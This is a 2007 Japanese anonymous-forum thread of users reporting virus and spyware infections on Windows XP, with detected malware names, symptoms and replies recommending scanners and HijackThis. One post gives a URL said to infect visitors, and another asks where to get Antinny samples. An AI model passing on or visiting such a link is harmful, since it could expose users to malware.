80 :名無しさん@お腹いっぱい。:2007/01/03(水) 21:20:22
携帯から失礼します。
【使用OS】
WindowsXPHome
【MicrosoftUpdate】
しています。
【使用セキュリティソフト】
NortonAntiVirus2006
【セキュリティソフトの定義ファイルは最新の状態であるか】はい。
【ルータの有無】
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名)】
今は何も見つかりません。
【どんな症状が出るか】
接続状態で、様々な送信先に様々な件名でメールが送り続けられてしまいます。(そのたびノートンの電子メールスキャンが一通一通のスキャンを始めます。)
【症状が出る前に何をやったか】
期限が切れてしまったので、数カ月間定義ファイルの更新を怠っていました。
【症状を解決しようとどのような処置を取ったか】
即刻定義ファイルの更新を行い、チェックを行ったところ、ウイルスやスパイウェアが12種ほどあぶり出されてきました。それらは全て指示に従って処理したはずが、上記の症状だけが残ってしまったのです。
上記と同様の症状、解決方などご存知の方いらっしゃいましたら、ご教授いただけますでしょうか。
【使用OS】
WindowsXPHome
【MicrosoftUpdate】
しています。
【使用セキュリティソフト】
NortonAntiVirus2006
【セキュリティソフトの定義ファイルは最新の状態であるか】はい。
【ルータの有無】
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名)】
今は何も見つかりません。
【どんな症状が出るか】
接続状態で、様々な送信先に様々な件名でメールが送り続けられてしまいます。(そのたびノートンの電子メールスキャンが一通一通のスキャンを始めます。)
【症状が出る前に何をやったか】
期限が切れてしまったので、数カ月間定義ファイルの更新を怠っていました。
【症状を解決しようとどのような処置を取ったか】
即刻定義ファイルの更新を行い、チェックを行ったところ、ウイルスやスパイウェアが12種ほどあぶり出されてきました。それらは全て指示に従って処理したはずが、上記の症状だけが残ってしまったのです。
上記と同様の症状、解決方などご存知の方いらっしゃいましたら、ご教授いただけますでしょうか。
81 :名無しさん@お腹いっぱい。:2007/01/04(木) 05:32:07
【使用OS】
WindowsXPHome
【MicrosoftUpdate】
しています
【使用セキュリティソフト】
NortonAntiVirus2006
【セキュリティソフトの定義ファイルは最新の状態であるか】
はい
【ルータの有無】
あります
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名)】
検出されなかった
【どんな症状が出るか】
今のところ出ていない
【症状が出る前に何をやったか】
定義ファイルの更新
【症状を解決しようとどのような処置を取ったか】
ノートンのオンラインウイルス検出
【その他の質問】
//headline-news.tripod.com/national/20061109-00000132-mai-soc.html
このサイトをを他のサイトのリンクから開いてしまったのですが(開くとウイルスに感染します!)
ページが出るのが遅くてすぐに閉じてしまいました。
その後このサイトがウイルスに感染するのを知って怖くなり
ノートンのオンラインウイルス検出をしてみたのですが
検出されませんでした。
これはウイルスに感染してないということでしょうか。
WindowsXPHome
【MicrosoftUpdate】
しています
【使用セキュリティソフト】
NortonAntiVirus2006
【セキュリティソフトの定義ファイルは最新の状態であるか】
はい
【ルータの有無】
あります
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名)】
検出されなかった
【どんな症状が出るか】
今のところ出ていない
【症状が出る前に何をやったか】
定義ファイルの更新
【症状を解決しようとどのような処置を取ったか】
ノートンのオンラインウイルス検出
【その他の質問】
//headline-news.tripod.com/national/20061109-00000132-mai-soc.html
このサイトをを他のサイトのリンクから開いてしまったのですが(開くとウイルスに感染します!)
ページが出るのが遅くてすぐに閉じてしまいました。
その後このサイトがウイルスに感染するのを知って怖くなり
ノートンのオンラインウイルス検出をしてみたのですが
検出されませんでした。
これはウイルスに感染してないということでしょうか。
82 :名無しさん@お腹いっぱい。:2007/01/04(木) 11:44:27
>>82
返答ありがとうございます。
早速他のオンラインスキャンをいろいろ使ってみましたが
やはり検出されず。
Ad-AwareやSpybotでも何も検出されませんでした。
ページが404だったのは知りませんでした。
もしかしてページが出る速度が遅いのもすでに404だったからかも?
どちらにしろ報告ありがとうございました。
返答ありがとうございます。
早速他のオンラインスキャンをいろいろ使ってみましたが
やはり検出されず。
Ad-AwareやSpybotでも何も検出されませんでした。
ページが404だったのは知りませんでした。
もしかしてページが出る速度が遅いのもすでに404だったからかも?
どちらにしろ報告ありがとうございました。
84 :名無しさん@お腹いっぱい。:2007/01/04(木) 21:46:07
85 :名無しさん@お腹いっぱい。:2007/01/04(木) 22:02:07
86 :名無しさん@お腹いっぱい。:2007/01/05(金) 00:04:43
考えてみたのですが、「ウィルス」は、コンピュータを様々な弱点をつく、
近年では巧妙な手口でインストールさせるとか、ウィルスをパソコンに混入
させるとか、様々な手法の手口が見受けられますが・・・例えば、最近に
製造されたウィルスが、ある一つのWebサイトや、共有
ソフトで共有されるファイル等を介して、他人のPCに侵入
したとします。そこで、アンチウィルスの大手企業会社はそれを
すぐさま発見し、現在インストールされてるソフトのバージョンアップ
を、警告として要求してきますよね。ウィルスが無かったら、アンチウィル
スのソフトは、売れないし、会社は儲かりませんよね。アンチウィルスソ
フトが成功するには、ウィルスが必要ということになりますね。
これじゃあ、同じことの繰り返しですね。どちらかがどちらかを勝らないと
、永遠に同じ状況の繰り返しですね。ある企業が、どの世の、どのウィルス
どの悪意のあるソフト、どのコンピューター上におけるウィルスを根こそぎ
破壊、消滅、抹殺を実行するソフトが現れるなんて、現代の技術では無理
難題かもしれません。どちらかがどちらかを勝らないと、両者とも永遠に
進化し続けて、無限に続いていく世界なのかもしれません。ウィルスを
製造するものは、他人のコンピューターに問題を起こしたり、システムに
重大なエラーを起こしたり、起動しなくしたり、そのものの機能として
成り立たなくしたりするウィルスは、近年大量に出回っていることでしょう
多分、製造する物はそれが仕事か個人で制作して楽しいからやっているのか
・・・。第一、ウィルスも、アンチウィルスソフトも、共に必要性は無いです
どうして「ウィルス」等という意味の無い物質がこの世にあるのでしょうか
このようなバランス関係は、歴史的背景から見ると、似たような物が多々
あると思います。この状況が改善される日は、遠いと思います。
近年では巧妙な手口でインストールさせるとか、ウィルスをパソコンに混入
させるとか、様々な手法の手口が見受けられますが・・・例えば、最近に
製造されたウィルスが、ある一つのWebサイトや、共有
ソフトで共有されるファイル等を介して、他人のPCに侵入
したとします。そこで、アンチウィルスの大手企業会社はそれを
すぐさま発見し、現在インストールされてるソフトのバージョンアップ
を、警告として要求してきますよね。ウィルスが無かったら、アンチウィル
スのソフトは、売れないし、会社は儲かりませんよね。アンチウィルスソ
フトが成功するには、ウィルスが必要ということになりますね。
これじゃあ、同じことの繰り返しですね。どちらかがどちらかを勝らないと
、永遠に同じ状況の繰り返しですね。ある企業が、どの世の、どのウィルス
どの悪意のあるソフト、どのコンピューター上におけるウィルスを根こそぎ
破壊、消滅、抹殺を実行するソフトが現れるなんて、現代の技術では無理
難題かもしれません。どちらかがどちらかを勝らないと、両者とも永遠に
進化し続けて、無限に続いていく世界なのかもしれません。ウィルスを
製造するものは、他人のコンピューターに問題を起こしたり、システムに
重大なエラーを起こしたり、起動しなくしたり、そのものの機能として
成り立たなくしたりするウィルスは、近年大量に出回っていることでしょう
多分、製造する物はそれが仕事か個人で制作して楽しいからやっているのか
・・・。第一、ウィルスも、アンチウィルスソフトも、共に必要性は無いです
どうして「ウィルス」等という意味の無い物質がこの世にあるのでしょうか
このようなバランス関係は、歴史的背景から見ると、似たような物が多々
あると思います。この状況が改善される日は、遠いと思います。
87 :名無しさん@お腹いっぱい。:2007/01/05(金) 09:18:16
妹の死体をノコギリで
まで読んだ
まで読んだ
88 :名無しさん@お腹いっぱい。:2007/01/05(金) 09:53:03
>>86
おまいは考えなくていいから
おまいは考えなくていいから
89 :名無しさん@お腹いっぱい。:2007/01/05(金) 12:14:10
あげ
90 :名無しさん@お腹いっぱい。:2007/01/05(金) 13:30:17
>>80
スパイウエア対策ソフト入れて削除する
スパイウエア対策ソフト入れて削除する
91 :名無しさん@お腹いっぱい。:2007/01/05(金) 15:57:05
ヤフーのログイン状態のままでずっといると
何か危険ですか?
何か危険ですか?
92 :名無しさん@お腹いっぱい。:2007/01/05(金) 16:58:57
質問失礼します…。
四時間ぐらい前にハンゲームでゲームをしていたところ本体の方から変な音がしだして…画面が青くなり、なにやら文字がでてきました。(文字は英語です。
そのあと五分後くらいしたら再起動がかかってしまいました。それからWindowsが開けなくなりました…。
どうすればよろしいのでしょうか…
四時間ぐらい前にハンゲームでゲームをしていたところ本体の方から変な音がしだして…画面が青くなり、なにやら文字がでてきました。(文字は英語です。
そのあと五分後くらいしたら再起動がかかってしまいました。それからWindowsが開けなくなりました…。
どうすればよろしいのでしょうか…
93 :名無しさん@お腹いっぱい。:2007/01/05(金) 17:53:22
PC買い換えしかないだろ…
常識的に考えて…
常識的に考えて…
94 :名無しさん@お腹いっぱい。:2007/01/05(金) 18:12:57
そうですか…。本体だけ買い替えで大丈夫ですよね…?液晶等は買い替えの必要ないですよね?
95 :名無しさん@お腹いっぱい。:2007/01/05(金) 18:36:56
メーカーPCの中にはモニタと本体が独自の端子で繋がってるものもあるから
そういう場合は丸ごと買い替え
ttp://ja.wikipedia.org/wiki/%E7%94%BB%E5%83%8F:DE15_Connector_Pinout.svg
接続端子がこんなやつだったら多分使い回しは可能
何かスレ違いの話題だな
PC初心者板にでも行ってくれ
そういう場合は丸ごと買い替え
ttp://ja.wikipedia.org/wiki/%E7%94%BB%E5%83%8F:DE15_Connector_Pinout.svg
接続端子がこんなやつだったら多分使い回しは可能
何かスレ違いの話題だな
PC初心者板にでも行ってくれ
96 :名無しさん@お腹いっぱい。:2007/01/05(金) 19:36:56
【使用OS】
WindowsXP
【MicrosoftUpdate】
しています
【使用セキュリティソフト】
Kingsoft Internet Security
【セキュリティソフトの定義ファイルは最新の状態であるか】
自動で最新に更新されます
【ルータの有無】
有
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名)】
Win32.Adware.Cydoor.a.331776
【どんな症状が出るか】
重大な症状は今のところ無いみたいです。
【症状が出る前に何をやったか】
今のところ症状は出ていません。
【症状を解決しようとどのような処置を取ったか】
Kingsoftでウィルスを隔離しています。
削除することも可能ですが、今は隔離しています。
【その他の質問】
もう1つウィルスが入ってきているみたいです。
Win32.Adware.Cydoor.a.42496
です。
2つとも久しぶりに完全スキャンを行ったら出てきました。
今のところ重大な症状は出てきていないのですが…。
削除してもよろしいのでしょうか?
元の場所は2つともC:\WINDOWS\system32にありました。
WindowsXP
【MicrosoftUpdate】
しています
【使用セキュリティソフト】
Kingsoft Internet Security
【セキュリティソフトの定義ファイルは最新の状態であるか】
自動で最新に更新されます
【ルータの有無】
有
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名)】
Win32.Adware.Cydoor.a.331776
【どんな症状が出るか】
重大な症状は今のところ無いみたいです。
【症状が出る前に何をやったか】
今のところ症状は出ていません。
【症状を解決しようとどのような処置を取ったか】
Kingsoftでウィルスを隔離しています。
削除することも可能ですが、今は隔離しています。
【その他の質問】
もう1つウィルスが入ってきているみたいです。
Win32.Adware.Cydoor.a.42496
です。
2つとも久しぶりに完全スキャンを行ったら出てきました。
今のところ重大な症状は出てきていないのですが…。
削除してもよろしいのでしょうか?
元の場所は2つともC:\WINDOWS\system32にありました。
97 :名無しさん@お腹いっぱい。:2007/01/05(金) 20:26:25
antinnyの検体置いてあるとこ教えて。
98 :名無しさん@お腹いっぱい。:2007/01/05(金) 20:30:24
誰か助けてください。
先日人に貸したSDカードからウィルスが入りました。去年のノートンは入っていた
のですが別に大した事も無いだろうと思い更新していませんでした。それで早速
ソースネクストのソフトを買いましたが駆除できずフリーウェアも探しましたが
どれも効きません。
そこでハードをフォーマットしてリカバリーをかけましたがまだ残っている様子、
はっきり言ってどうしたらいいのか解りません。
新しいソフトを買っても良いのですが効かないソフトに金をつぎ込みたくないし、
これって例えばハードを新しいのに乗せ換えてリカバリーしたら元の状態に
戻るのでしょうか?
誰か教えてください。
先日人に貸したSDカードからウィルスが入りました。去年のノートンは入っていた
のですが別に大した事も無いだろうと思い更新していませんでした。それで早速
ソースネクストのソフトを買いましたが駆除できずフリーウェアも探しましたが
どれも効きません。
そこでハードをフォーマットしてリカバリーをかけましたがまだ残っている様子、
はっきり言ってどうしたらいいのか解りません。
新しいソフトを買っても良いのですが効かないソフトに金をつぎ込みたくないし、
これって例えばハードを新しいのに乗せ換えてリカバリーしたら元の状態に
戻るのでしょうか?
誰か教えてください。
100 :名無しさん@お腹いっぱい。:2007/01/06(土) 09:06:14
101 :名無しさん@お腹いっぱい。:2007/01/06(土) 09:14:17
102 :名無しさん@お腹いっぱい。:2007/01/06(土) 09:15:19
103 :名無しさん@お腹いっぱい。:2007/01/06(土) 09:19:18
104 :名無しさん@お腹いっぱい。:2007/01/06(土) 09:24:05
どこか削除しなくていいですか
パソコンに何か残ってませんか
パソコンに何か残ってませんか
105 :名無しさん@お腹いっぱい。:2007/01/06(土) 09:29:46
越中ふんどし
106 :名無しさん@お腹いっぱい。:2007/01/06(土) 09:40:12
どこか削除しなくていいですか
パソコンに何か残ってませんか
パソコンに何か残ってませんか
107 :名無しさん@お腹いっぱい。:2007/01/06(土) 09:42:18
108 :名無しさん@お腹いっぱい。:2007/01/06(土) 09:43:38
日本語が出来るようになってからまた来てくれ。
109 :名無しさん@お腹いっぱい。:2007/01/06(土) 09:45:38
ありがとうございました
110 :名無しさん@お腹いっぱい。:2007/01/06(土) 09:49:33
何故に二回ずつ書きこむのだろうか
111 :名無しさん@お腹いっぱい。:2007/01/06(土) 12:58:39
【使用OS】
XP home
【MicrosoftUpdate】
してる
【使用セキュリティソフト】
ノートンインターネットセキュリティ
【セキュリティソフトの定義ファイルは最新の状態であるか】
最新
【ルータの有無】
あり
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名)】
Trojan-PSW.Win32.QQPass.se
【どんな症状が出るか】
病状特に無し
先程ノートンインターネットセキュリティでスキャン実行し、
何事も無く終了したのですが、
念のためにカスペルキーオンラインスキャンを実行したところ、
「Trojan-PSW.Win32.QQPass.se」というものが感染ファイルとして出てきました。
感染ファイルは、
Norton Internet Security\Norton AntiVirus\Quarantine に入ってるようです。
これは感染なのでしょうか?
XP home
【MicrosoftUpdate】
してる
【使用セキュリティソフト】
ノートンインターネットセキュリティ
【セキュリティソフトの定義ファイルは最新の状態であるか】
最新
【ルータの有無】
あり
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名)】
Trojan-PSW.Win32.QQPass.se
【どんな症状が出るか】
病状特に無し
先程ノートンインターネットセキュリティでスキャン実行し、
何事も無く終了したのですが、
念のためにカスペルキーオンラインスキャンを実行したところ、
「Trojan-PSW.Win32.QQPass.se」というものが感染ファイルとして出てきました。
感染ファイルは、
Norton Internet Security\Norton AntiVirus\Quarantine に入ってるようです。
これは感染なのでしょうか?
112 :名無しさん@お腹いっぱい。:2007/01/06(土) 13:43:49
113 :名無しさん@お腹いっぱい。:2007/01/06(土) 14:11:24
114 :名無しさん@お腹いっぱい。:2007/01/06(土) 19:14:20
エロサイト開いて遊んでいたら、ワンクリツク詐欺にあいまして
115 :名無しさん@お腹いっぱい。:2007/01/06(土) 19:38:44
それから、それから
116 :名無しさん@お腹いっぱい。:2007/01/06(土) 19:48:29
【使用OS】 windows2000sp4
【MicrosoftUpdate】 してる
【使用セキュリティソフト】 systemdoctor
【セキュリティソフトの定義ファイルは最新の状態であるか】 はい
【ルータの有無】 無し
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名)】
206のエラーがサイトのスキャンで検出
【どんな症状が出るか】 広告とか
【症状が出る前に何をやったか】 バナーをカチリ
【症状を解決しようとどのような処置を取ったか】 メッセージにはい
【その他の質問】最強!
【MicrosoftUpdate】 してる
【使用セキュリティソフト】 systemdoctor
【セキュリティソフトの定義ファイルは最新の状態であるか】 はい
【ルータの有無】 無し
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名)】
206のエラーがサイトのスキャンで検出
【どんな症状が出るか】 広告とか
【症状が出る前に何をやったか】 バナーをカチリ
【症状を解決しようとどのような処置を取ったか】 メッセージにはい
【その他の質問】最強!
117 : ◆N9P3SuvBPo :2007/01/08(月) 02:48:46
平和だ〜ヽ(´ー`)ノ
118 :名無しさん@お腹いっぱい。:2007/01/08(月) 07:19:06
>>116
つSpybotなど
つSpybotなど
119 :名無しさん@お腹いっぱい。:2007/01/10(水) 12:48:32
【使用OS】 WindowsXP SP2
【MicrosoftUpdate】 はい
【使用セキュリティソフト】Symantec AntiVirus
【セキュリティソフトの定義ファイルは最新の状態であるか】はい
【ルータの有無】
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名)】
Bloodhound.NsAnti
【どんな症状が出るか】
共有フォルダのファイルが消える
exe.exeファイルが勝手に作成される
【症状が出る前に何をやったか】
誰かがウイルスを持ってきて、それが共有フォルダから広まった?
【症状を解決しようとどのような処置を取ったか】
ウイルス定義ファイルの更新とスキャン
【その他の質問】 対処法を教えてください
【MicrosoftUpdate】 はい
【使用セキュリティソフト】Symantec AntiVirus
【セキュリティソフトの定義ファイルは最新の状態であるか】はい
【ルータの有無】
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名)】
Bloodhound.NsAnti
【どんな症状が出るか】
共有フォルダのファイルが消える
exe.exeファイルが勝手に作成される
【症状が出る前に何をやったか】
誰かがウイルスを持ってきて、それが共有フォルダから広まった?
【症状を解決しようとどのような処置を取ったか】
ウイルス定義ファイルの更新とスキャン
【その他の質問】 対処法を教えてください
上に付け足しですが、Windows2000は感染しませんでした。
対処法分かる方がいましたら教えてください。
対処法分かる方がいましたら教えてください。
121 :名無しさん@お腹いっぱい。:2007/01/10(水) 13:16:43
>>120
Bloodhound.NsAnti
未知の脅威の可能性があるものが発見された場合、ウイルス名 Bloodhound.NsAnti を使用します。
Bloodhound.NsAnti として検出されるファイルは、ワームやトロイの木馬の新しい亜種である可能性が
あります。このようなファイルは、分析のために Symantec Security Response へ提出してください。
スキャンと配信機能を使用してファイルを提出する方法については、"スキャンと配信ウィザードを使用して
Symantec Security Response に疑わしいファイルを提出する方法" をご覧ください。
ttp://www.symantec.com/region/jp/avcenter/venc/data/pf/jp-bloodhound.nsanti.html
検体提出するのが一番良い希ガス。
その検体漏れも欲しいな。
Bloodhound.NsAnti
未知の脅威の可能性があるものが発見された場合、ウイルス名 Bloodhound.NsAnti を使用します。
Bloodhound.NsAnti として検出されるファイルは、ワームやトロイの木馬の新しい亜種である可能性が
あります。このようなファイルは、分析のために Symantec Security Response へ提出してください。
スキャンと配信機能を使用してファイルを提出する方法については、"スキャンと配信ウィザードを使用して
Symantec Security Response に疑わしいファイルを提出する方法" をご覧ください。
ttp://www.symantec.com/region/jp/avcenter/venc/data/pf/jp-bloodhound.nsanti.html
検体提出するのが一番良い希ガス。
その検体漏れも欲しいな。
122 :名無しさん@お腹いっぱい。:2007/01/10(水) 21:50:55
Tempに小僧フォルダという見慣れないフォルダを見つけました中は木幡OOという空フォルダ・・・
ノートン無反応。何でしょうか?
ノートン無反応。何でしょうか?
123 :名無しさん@お腹いっぱい。:2007/01/11(木) 14:47:22
【使用OS】 windowsXP
【MicrosoftUpdate】 すみませんわかりません(汗
【使用セキュリティソフト】 ウイルスバスター2006
【セキュリティソフトの定義ファイルは最新の状態であるか】最新
【ルータの有無】 有り
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名)】
感染したのは昨日です
ウイルスバスターでは何も検出されませんでした
【どんな症状が出るか】
以下に記述します
【症状が出る前に何をやったか】
2ちゃんの壺を使って2ちゃんを見てました
画像ファイルをクリックしたらなかなか表示されずに変になったので、そのページを閉じました
それ以降インターネットで新しいページを開こうとすると重くなって、黒い画面がでたりしました
でもマウスを動かすと一応表示はされました
【症状を解決しようとどのような処置を取ったか】
ウイルスバスターでは検出されなかったので、とりあえず壺を削除しました
そしたら症状がなくなったので、今はまた壺をDLしてます
今は症状は出ないのですが心配で・・
症状がなくなっただけでまだウイルスに感染中なのかも・・
【その他の質問】
このウイルスのせいなのかはわからないのですが、
今日気づいたのですが何故かインストールした覚えのないプログラムがあります・・
名前を挙げると、Ghostscript、Imagemagick、SWIprolog、winShell、PanasonicWirelessDisplayの5つです
調べたところ悪いプログラムではないようですが・・
このノートPCはwindowsとLinuxの二つOSが入ってるので、
Linux側にあったプログラムが勝手に移行されたという可能性もあるかもしれません・・
Linuxにこんなプログラムが入ってたかどうかまでは覚えていませんが・・
なんかグダグダですみません・・
何でも構わないので何か教えてくださいお願いします!
【MicrosoftUpdate】 すみませんわかりません(汗
【使用セキュリティソフト】 ウイルスバスター2006
【セキュリティソフトの定義ファイルは最新の状態であるか】最新
【ルータの有無】 有り
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名)】
感染したのは昨日です
ウイルスバスターでは何も検出されませんでした
【どんな症状が出るか】
以下に記述します
【症状が出る前に何をやったか】
2ちゃんの壺を使って2ちゃんを見てました
画像ファイルをクリックしたらなかなか表示されずに変になったので、そのページを閉じました
それ以降インターネットで新しいページを開こうとすると重くなって、黒い画面がでたりしました
でもマウスを動かすと一応表示はされました
【症状を解決しようとどのような処置を取ったか】
ウイルスバスターでは検出されなかったので、とりあえず壺を削除しました
そしたら症状がなくなったので、今はまた壺をDLしてます
今は症状は出ないのですが心配で・・
症状がなくなっただけでまだウイルスに感染中なのかも・・
【その他の質問】
このウイルスのせいなのかはわからないのですが、
今日気づいたのですが何故かインストールした覚えのないプログラムがあります・・
名前を挙げると、Ghostscript、Imagemagick、SWIprolog、winShell、PanasonicWirelessDisplayの5つです
調べたところ悪いプログラムではないようですが・・
このノートPCはwindowsとLinuxの二つOSが入ってるので、
Linux側にあったプログラムが勝手に移行されたという可能性もあるかもしれません・・
Linuxにこんなプログラムが入ってたかどうかまでは覚えていませんが・・
なんかグダグダですみません・・
何でも構わないので何か教えてくださいお願いします!
124 :名無しさん@お腹いっぱい。:2007/01/11(木) 16:22:15
【使用OS】
windows XP
【MicrosoftUpdate】
【使用セキュリティソフト】
avast! 4.7
【セキュリティソフトの定義ファイルは最新の状態であるか】
最新
【ルータの有無】
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名)】
ファイル名:C:\WINDOWS\System32
ウィルス名:Win32:CWS-Y [Trj] Win32:Agent-AIV [Trj] Win32:Agent-EAD [Trj] Win32:Small-DJJ [Trj]
【どんな症状が出るか】
update[数字].exeが増える パソコンが重くなる
【症状が出る前に何をやったか】
mixiの登録画面を開いた
【症状を解決しようとどのような処置を取ったか】
avast! 4.7、Spybotを使って、出たもの全てを駆除。
しかし、avast! 4.7は反応しなくなったものの、パソコンを起動させてから
3、4時間は重すぎてパソコンが使えない、仮想メモリが不足してると出る。
3、4時間をすぎると、何事もなかったかのようにパソコンは軽くなり、
普通にネットができる。
【その他の質問】
最初は、外国の広告がよく出てきた。
勝手にウィルス駆除ソフト(?)等がインストールされてたので、
アンインストールをしたら出なくなる。
しかしその後、【症状を解決しようとどのような処置を取ったか】に書いた症状が出る。
よろしくお願い致します。
windows XP
【MicrosoftUpdate】
【使用セキュリティソフト】
avast! 4.7
【セキュリティソフトの定義ファイルは最新の状態であるか】
最新
【ルータの有無】
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名)】
ファイル名:C:\WINDOWS\System32
ウィルス名:Win32:CWS-Y [Trj] Win32:Agent-AIV [Trj] Win32:Agent-EAD [Trj] Win32:Small-DJJ [Trj]
【どんな症状が出るか】
update[数字].exeが増える パソコンが重くなる
【症状が出る前に何をやったか】
mixiの登録画面を開いた
【症状を解決しようとどのような処置を取ったか】
avast! 4.7、Spybotを使って、出たもの全てを駆除。
しかし、avast! 4.7は反応しなくなったものの、パソコンを起動させてから
3、4時間は重すぎてパソコンが使えない、仮想メモリが不足してると出る。
3、4時間をすぎると、何事もなかったかのようにパソコンは軽くなり、
普通にネットができる。
【その他の質問】
最初は、外国の広告がよく出てきた。
勝手にウィルス駆除ソフト(?)等がインストールされてたので、
アンインストールをしたら出なくなる。
しかしその後、【症状を解決しようとどのような処置を取ったか】に書いた症状が出る。
よろしくお願い致します。
125 :名無しさん@お腹いっぱい。:2007/01/11(木) 16:27:31
【使用OS】 XP SP2
【MicrosoftUpdate】 してます
【使用セキュリティソフト】 Norton Internet Security
【セキュリティソフトの定義ファイルは最新の状態であるか】 最新
【ルータの有無】 なし
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名)】 W32.Mytob.QU@mm
【どんな症状が出るか】 ACCOUNT ALERTなる英文メールが来る
【症状が出る前に何をやったか】 なんか良く覚えていない
【症状を解決しようとどのような処置を取ったか】 フルスキャン
【その他の質問】
シマンテックのHP上で出ている処置方法をやってみたが、レジストリに書き込まれている
はずのexplore exeなるものが発見できない。
とりあえずOutlookのメッセージルールで削除する様にはしてあるが、根本解決したいので
よろしくお願いします。
【MicrosoftUpdate】 してます
【使用セキュリティソフト】 Norton Internet Security
【セキュリティソフトの定義ファイルは最新の状態であるか】 最新
【ルータの有無】 なし
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名)】 W32.Mytob.QU@mm
【どんな症状が出るか】 ACCOUNT ALERTなる英文メールが来る
【症状が出る前に何をやったか】 なんか良く覚えていない
【症状を解決しようとどのような処置を取ったか】 フルスキャン
【その他の質問】
シマンテックのHP上で出ている処置方法をやってみたが、レジストリに書き込まれている
はずのexplore exeなるものが発見できない。
とりあえずOutlookのメッセージルールで削除する様にはしてあるが、根本解決したいので
よろしくお願いします。
126 :名無しさん@お腹いっぱい。:2007/01/11(木) 17:04:34
レジクリーナーとかはウイルス対策に有効かな?
127 : ◆N9P3SuvBPo :2007/01/11(木) 17:59:15
>123
OSはWindowsXPとありますよね?
SP2がインストールされているかを確認します。
マイコンピュータのプロパティ画面を開いて
「Windows XP
Service Pack 2」
があれば
【MicrosoftUpdate】は自動更新になってるはずなので最新だと思われます。
とりあえずなんですが…
カスペルスキーのオンラインスキャンを試してみることをお奨めします。
ttp://kaspersky.co.jp/
>124
C:\WINDOWS\System32 フォルダ内に
Win32:CWS-Y [Trj] Win32:Agent-AIV [Trj] Win32:Agent-EAD [Trj] Win32:Small-DJJ [Trj] が見付かったと。
HijackThisのログが必要ですね。
>125
今のご時世ルータは必須ですよw
で、ノートン先生が「W32.Mytob.QU@mm」を
ACCOUNT ALERTなる英文メールに
記載されていた添付ファイルに反応したということでしょうか?
OSはWindowsXPとありますよね?
SP2がインストールされているかを確認します。
マイコンピュータのプロパティ画面を開いて
「Windows XP
Service Pack 2」
があれば
【MicrosoftUpdate】は自動更新になってるはずなので最新だと思われます。
とりあえずなんですが…
カスペルスキーのオンラインスキャンを試してみることをお奨めします。
ttp://kaspersky.co.jp/
>124
C:\WINDOWS\System32 フォルダ内に
Win32:CWS-Y [Trj] Win32:Agent-AIV [Trj] Win32:Agent-EAD [Trj] Win32:Small-DJJ [Trj] が見付かったと。
HijackThisのログが必要ですね。
>125
今のご時世ルータは必須ですよw
で、ノートン先生が「W32.Mytob.QU@mm」を
ACCOUNT ALERTなる英文メールに
記載されていた添付ファイルに反応したということでしょうか?
128 :名無しさん@お腹いっぱい。:2007/01/11(木) 18:10:17
>>127
>で、ノートン先生が「W32.Mytob.QU@mm」を
>ACCOUNT ALERTなる英文メールに
>記載されていた添付ファイルに反応したということでしょうか?
いや、うさんくさいメールだったので、Googleで調べてみたらコレだった、と。
シマンテックのHPに載ってるメール本文が全く同一だったので。
で、処置方法によれば、レジストリ内にexplore exeが作られてるから
ソレを削除せよ、と。
しかし、ソレが無い!
>で、ノートン先生が「W32.Mytob.QU@mm」を
>ACCOUNT ALERTなる英文メールに
>記載されていた添付ファイルに反応したということでしょうか?
いや、うさんくさいメールだったので、Googleで調べてみたらコレだった、と。
シマンテックのHPに載ってるメール本文が全く同一だったので。
で、処置方法によれば、レジストリ内にexplore exeが作られてるから
ソレを削除せよ、と。
しかし、ソレが無い!
129 :名無しさん@お腹いっぱい。:2007/01/11(木) 18:28:46
>>127
ありがとうございます。HijackThisのログです。
Logfile of HijackThis v1.99.1
Scan saved at 18:17:06, on 2007/01/11
Platform: Windows XP (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 (6.00.2600.0000)
Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\spoolsv.exe
C:\WINDOWS\Explorer.EXE
C:\Program Files\Alwil Software\Avast4\aswUpdSv.exe
C:\Program Files\Alwil Software\Avast4\ashServ.exe
C:\Program Files\Network Associates\VirusScan\Avsynmgr.exe
C:\WINDOWS\System32\S3hotkey.exe
C:\WINDOWS\System32\S3tray2.exe
ありがとうございます。HijackThisのログです。
Logfile of HijackThis v1.99.1
Scan saved at 18:17:06, on 2007/01/11
Platform: Windows XP (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 (6.00.2600.0000)
Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\spoolsv.exe
C:\WINDOWS\Explorer.EXE
C:\Program Files\Alwil Software\Avast4\aswUpdSv.exe
C:\Program Files\Alwil Software\Avast4\ashServ.exe
C:\Program Files\Network Associates\VirusScan\Avsynmgr.exe
C:\WINDOWS\System32\S3hotkey.exe
C:\WINDOWS\System32\S3tray2.exe
130 :名無しさん@お腹いっぱい。:2007/01/11(木) 18:29:17
C:\WINDOWS\System32\pctspk.exe
C:\Program Files\Apoint2K\Apoint.exe
C:\Program Files\Java\jre1.5.0_08\bin\jusched.exe
C:\Program Files\MessengerPlus! 3\MsgPlus.exe
C:\PROGRA~1\ALWILS~1\Avast4\ashDisp.exe
C:\Program Files\QuickTime\qttask.exe
C:\WINDOWS\System32\svchost.exe
C:\Program Files\iTunes\iTunesHelper.exe
